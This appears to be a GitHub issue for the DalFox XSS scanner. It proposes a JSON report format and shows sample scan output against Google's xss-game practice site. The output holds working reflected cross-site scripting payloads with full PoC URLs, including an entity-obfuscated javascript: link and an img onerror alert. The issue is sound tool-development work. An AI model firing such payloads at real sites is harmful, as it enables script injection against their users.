미리 감사합니다 대해커왕님
like this (authz0)
https://dalfox.hahwul.com/docs/json/
[
{
"type":"Type of PoC (G/R/V)",
"inject_type":"Injected Point",
"poc_type":"plain/curl/httpie/etc...",
"method":"HTTP Method",
"data":"PoC URL",
"param":"Parameter",
"payload":"Attack Value",
"evidence":"Evidence with response body",
"cwe":"CWE ID",
"severity": "Severity (Low/Medium/High)"
}
]
--format=json
--report
--report-format='plain/json'
{
"logs": null,
"pocs": [
{
"type": "R",
"inject_type": "inHTML-URL",
"poc_type": "plain",
"method": "GET",
"data": "https://xss-game.appspot.com/level1/frame?query=%22%3E%3Ca+href%3Djavas%26%2399%3Bript%3Aalert%281%29%2Fclass%3Ddalfox%3Eclick",
"param": "query",
"payload": "\"\u003e\u003ca href=javas\u0026#99;ript:alert(1)/class=dalfox\u003eclick",
"evidence": "13 line: s were found for \u003cb\u003e\"\u003e\u003ca href=javas\u0026#99;ript:alert(1)/class=dalfox\u003eclick\u003c/b\u003e. \u003ca",
"cwe": "CWE-79",
"severity": "Medium"
},
{
"type": "V",
"inject_type": "inHTML-URL",
"poc_type": "plain",
"method": "GET",
"data": "https://xss-game.appspot.com/level1/frame?query=%27%3E%3Cimg%2Fsrc%2Fonerror%3D.1%7Calert%60%60+class%3Ddalfox%3E",
"param": "query",
"payload": "'\u003e\u003cimg/src/onerror=.1|alert`` class=dalfox\u003e",
"evidence": "13 line: s were found for \u003cb\u003e'\u003e\u003cimg/src/onerror=.1|alert`` class=dalfox\u003e\u003c/b\u003e. \u003ca href='?'",
"cwe": "CWE-79",
"severity": "High"
}
],
"params": [
{
"Name": "query",
"Type": "URL",
"Reflected": true,
"ReflectedPoint": "/inHTML-none(1)",
"ReflectedCode": "13 line: Sorry, no results were found for \u003cb\u003eDalFox\u003c/b\u003e. \u003ca href='?'\u003eTry again",
"Vuln": false,
"Chars": [
"+",
":",
"`",
"(",
"]",
"\\",
"=",
"\u003c",
"-",
"}",
")",
"|",
"'",
".",
"[",
"{",
"\u003e",
",",
"$",
"\"",
";"
]
}
],
"duration": 6779151542,
"start_time": "2022-09-16T11:16:17.914863+09:00",
"end_time": "2022-09-16T11:16:24.69388+09:00"
}
cc @hojyh1
Show parameter analysis result when the scan finishes
e.g.